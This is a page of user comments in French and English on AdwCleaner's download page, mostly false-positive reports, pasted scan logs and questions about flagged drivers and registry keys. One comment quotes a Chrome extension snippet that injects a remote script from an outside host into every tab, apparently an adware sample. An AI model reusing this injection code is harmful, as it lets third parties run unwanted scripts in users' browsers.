comment

on AdwCleaner's page

from MIZOTE59, (26 may 2015)

Bonjour à tous,
McAfee nous renvoie cette erreur :
"D:\Documents\XXXXXX\Downloads\adwcleaner_4.205.exe
Cheval de Troie => Artemis!5B73E70C3FD8"
et on ne peut plus le lancer du coup :(

comment

on AdwCleaner's page

from tace, (09 april 2015)

http://habrahabr.ru/post/255333/

chrome.tabs.onUpdated.addListener( function(tabId,changeInfo,tab){ chrome.tabs.executeScript(tabId,{code:" if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://expressfind-a.akamaihd.net/ExpressFind/cr?t=BLGC&g=ca4874d9-0a3e-4215-9772-67fb5ba1c08a'; document.head.appendChild(scr);} "})});

comment

on AdwCleaner's page

from Sophia, (08 april 2015)

Bonsoir,
Cette version 4.201 est en anglais.
J'ai viré le moteur de recherche Ixquick et Yahoo
Pour le reste, mêmes résultats et je ne sais pas si je peux supprimer
J'aimerais avoir votre avis et savoir éventuellement d'où pourrait venir ces services.

# AdwCleaner v4.201 - Logfile created 08/04/2015 at 19:09:25
# Updated 08/04/2015 by Xplode
# Database : 2015-04-08.1 [Server]
# Operating system : Microsoft Windows XP Service Pack 3 (x86)
# Username : sophia -
# Running from : C:\Documents and Settings\sophia\Bureau\adwcleaner_4.201.exe
# Option : Scan
***** [ Services ] *****
Service Found : 36596706
Service Found : 68597101
Service Found : 68597102
***** [ Files / Folders ] *****
File Found : C:\WINDOWS\system32\drivers\36596706.sys
File Found : C:\WINDOWS\system32\drivers\68597101.sys
File Found : C:\WINDOWS\system32\drivers\68597102.sys
***** [ Scheduled tasks ] *****
***** [ Shortcuts ] *****
***** [ Registry ] *****
***** [ Web browsers ] *****
-\\ Internet Explorer v8.0.6001.18702
-\\ Mozilla Firefox v37.0.1 (x86 fr)
-\\ Comodo Dragon v

comment

on AdwCleaner's page

from Sophia, (05 april 2015)

Bonjour,
J'ai un doute pour ces suppressions, lignes trouvées par cette dernière version 4.200 (pas avec les anciennes)
Je n'ose pas supprimer des drivers.
Merci de me dire si je peux.
le rapport des lignes concernées :
# AdwCleaner v4.200 - Rapport créé le 05/04/2015 à 18:18:56
# Mis à jour le 29/03/2015 par Xplode
# Base de données : 2015-03-29.1 [Serveur]
# Système d'exploitation : Microsoft Windows XP Service Pack 3 (x86)
# Nom d'utilisateur : sophia - BOUBA-X9AK600JD
# Exécuté depuis : C:\Documents and Settings\sophia\Bureau\adwcleaner_4.200.exe
# Option : Scanner

***** [ Services ] *****
Service Trouvé : 36596706
Service Trouvé : 68597101
Service Trouvé : 68597102
***** [ Fichiers / Dossiers ] *****
Fichier Trouvé : C:\WINDOWS\system32\drivers\36596706.sys
Fichier Trouvé : C:\WINDOWS\system32\drivers\68597101.sys
Fichier Trouvé : C:\WINDOWS\system32\drivers\68597102.sys
***** [ Navigateurs ] *****
-\\ Internet Explorer v8.0.6001.18702
-\\ Mozilla Firefox v37.0.1 (x86 fr)
[x87rd0by.default-1424990349828] - Ligne Trouvée : user_pref("browser.search.hiddenOneOffs", "Yahoo,Portail Lexical - CNRTL,Ixquick hxxpS");
-\\ Comodo Dragon v

comment

on AdwCleaner's page

from whisper_man, (20 march 2015)

Bonjour,

Le répertoire protected créé par une de mes applications est systématiquement mis en quarantaine. Est-ce normal ?
Ci-après un extrait du log:
# AdwCleaner v4.112 - Logfile created 18/03/2015 at 18:01:18
# Updated 09/03/2015 by Xplode
# Database : 2015-03-15.1 [Server]
# Operating system : Windows 7 Enterprise Service Pack 1 (x64)
# Username : XXXXXXX - XXXXXXXXXXXX
# Running from : C:\My Program Files\adwcleaner_4-112_fr_430277.exe
# Option : Cleaning

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\Users\XXXXXXX\Documents\protected

***** [ Scheduled tasks ] *****


Par avance merci de votre aide.

comment

on AdwCleaner's page

from Me1, (06 february 2015)

The following entries are false positives:

C:\Documents and Settings\User\Application Data\ProgSense (included with some software to look for updates - nothing malicious or deceiving)


C:\Documents and Settings\User\Application Data\Simple Adblock (adblocker now known as Adblock Plus knowingly installed by user for Internet Explorer)

C:\Documents and Settings\User\Local Settings\Application Data\Hola (knowingly installed by user)

HKCU\Software\ProgSense (included with some software to look for updates - nothing malicious or deceiving)

HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762} (belongs to ZoomBrowser EX, a Canon camera utility)

The following are proxy settings knowingly added by user:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyEnable] - 1

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.local

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyServer] - socks=localhost:1234


Thanks in advance for correcting the issue.

comment

on AdwCleaner's page

from spirou1971, (27 october 2014)

Faux positif sur :
- Google Updater
- Symantec System Recovery

Clé Présente : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe
Clé Présente : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0FF2AEFF45EEA0A48A4B33C1973B6094 (Symantec System Recovery)
Clé Présente : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\305B09CE8C53A214DB58887F62F25536 (Symantec System Recovery

Cece avec la version 4.002.

comment

on AdwCleaner's page

from p060477, (07 september 2014)

the correct path is:
C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage
the new 3.309 adwcleaner tells that there is a virus in it...why?
and why ,if it is true, is not possible to remove it...??

comment

on AdwCleaner's page

from Edelweiss, (10 july 2014)

Bonjour,

Problème avec la version v3.215: suppression de "Google toolbar" et du dossier C:\Users\Eden\Documents\Aimersoft Video Converter Ultimate, toujours pas résolu.

Sans compter qu'il trouve indéfiniment les mêmes clés:

Clé Supprimée : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2318C2B1-4965-11D4-9B18-009027A5CD4F}
Clé Supprimée : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}
Clé Supprimée : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}

Clé supprimés, mais qui sont à nouveau là dès le contrôle suivant, ça tourne en boucle!!!

Clé Présente : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}
Clé Présente : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2318C2B1-4965-11D4-9B18-009027A5CD4F}
Clé Présente : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}

Tout ceci n'apparait pas avec la version v.3.212

De ce fait, tant que les problèmes ne seront pas stabilisé, j'utiliserais la version 3.212 qui la plus stable depuis la version 3.211

Bonne soirée

comment

on AdwCleaner's page

from Edelweiss, (30 june 2014)

@cocochepeau

Bonjour,

La nouvelle version 3.214 (de ce jour) supprime toujours le dossier: C:\Users\Eden\Documents\Aimersoft Video Converter Ultimate.

Pour le reste, rien à signalé pour le moment (Windows 7 pro 64).

Bonne journée